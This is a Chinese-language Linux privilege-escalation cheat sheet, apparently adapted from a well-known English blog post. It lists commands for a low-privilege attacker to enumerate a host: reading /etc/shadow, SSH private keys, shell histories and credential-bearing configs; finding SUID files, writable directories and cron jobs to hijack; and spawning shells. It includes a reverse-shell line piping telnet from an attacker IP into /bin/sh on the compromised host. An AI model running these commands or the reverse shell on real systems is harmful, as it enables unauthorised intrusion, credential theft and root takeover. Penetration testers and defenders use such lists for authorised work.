本文操作都是基于低权限的前提
攻击者在提权过程中会尝试大量的权限探测以达到提权的目的建议阅读者使用普通用户和root用户分别执行以对比执行效果
版本查询
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release # Debian系统及其衍生
cat /etc/redhat-release # Redhat系统及其衍生
是否是64位
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-查看环境变量设置
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set
查询打印机情况
lpstat -a
当前进程与服务
ps aux
ps -ef
top
cat /etc/services
以root权限运行的进程和服务 建议仔细检查
ps aux | grep root
ps -ef | grep root查询已安装软件和对应版本以及开机启动项
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/是否有不安全的错误配置
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/查看linux的任务计划 可以尝试替换并重启机器实现root
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root查询粗心的管理员留下的用户名和密码的文本内容
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla系统
查询管理员定制的nic驱动信息
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network查询当前主机网络设置 包括dns dhcp 还是静态网络
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname查询当前系统正在交互的系统信息
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w当前ip/mac缓存
arp -e
route
/sbin/route -nee
简单的嗅探数据 查看当前设置是否可以嗅探
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21
#备注 tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]尝试是否能执行shell(不建议这么使用 建议直接socat反弹)
nc -lvp 4444 # 攻击命令输入
nc -lvp 4445 # 攻击结果输出
telnet [攻击者 ip] 44444 | /bin/sh | [本地 ip] 44445 #在肉鸡上执行!使用攻击者ip!
检测端口转发
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7 #windows上ssh -L 8080:127.0.0.1:80 [email protected] # 本地映射到远程
ssh -R 8080:127.0.0.1:80 [email protected] # 远程映射到本地ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig #本地代理查看 觉得不实际查询系统用户情况
id
who
w
last
cat /etc/passwd | cut -d: -f1 # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l敏感文件内容查询
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/查询用户家目录文件
ls -ahlR /root/
ls -ahlR /home/查询可能包含用户密码的文件(不推荐 这个做法有问题)
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg管理员操作历史痕迹查询
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history查询其他用户信息
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/rootssh服务的key信息
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_keyetc目录下敏感文件
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone 文件属性是对应的 就不翻译了
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other
find /etc/ -readable -type f 2>/dev/null # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone
var目录下日志文件
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leasesweb隐藏的配置文件
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/系统日志文件
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/查询当前是否在jail里 或者 shell是否有限制
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i当前的mount记录
mount
df -h当前未mount但是已经连接并识别的设备系统
cat /etc/fstab查找SUID & GUID设置特殊标志的文件
find / -perm -1000 -type d 2>/dev/null
# 粘滞位-如果用户对目录有写权限,则可以删除其中的文件和子目录,即使该用户不是这些文件的所有者,而且也没有读或写许可
find / -perm -g=s -type f 2>/dev/null
# 以所有者用户组权限运行
find / -perm -u=s -type f 2>/dev/null
# 以所有者用户权限运行
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
# SGID 或 SUID文件查找
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done
#在这些目录下 /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin 查找 SGID or SUID 文件
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
#在以根目录下的三层目录内寻找不包括link文件的SGID或者SUID文件寻找可写并可执行目录或文件
find / -writable -type d 2>/dev/null #可写
find / -perm -222 -type d 2>/dev/null #可写
find / -perm -o w -type d 2>/dev/null #可写
find / -perm -o x -type d 2>/dev/null #可写
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print #可覆盖文件
find /dir -xdev \( -nouser -o -nogroup \) -print # 无所有者文件
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null #可写可执行寻找exp运行环境 有时候有些执行文件管理员并不是默认安装
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc查看可上传的通道
find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftpexploit查找的汇集网站
http://www.exploit-db.com
http://www.securiteam.com
http://www.securityfocus.com
http://www.exploitsearch.net
http://metasploit.com/modules/
http://securityreason.com
http://seclists.org/fulldisclosure/
http://www.google.com
https://github.com/SecWiki/linux-kernel-exploits去掉了原文一些过时或不可实现的操作
原文地址:
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/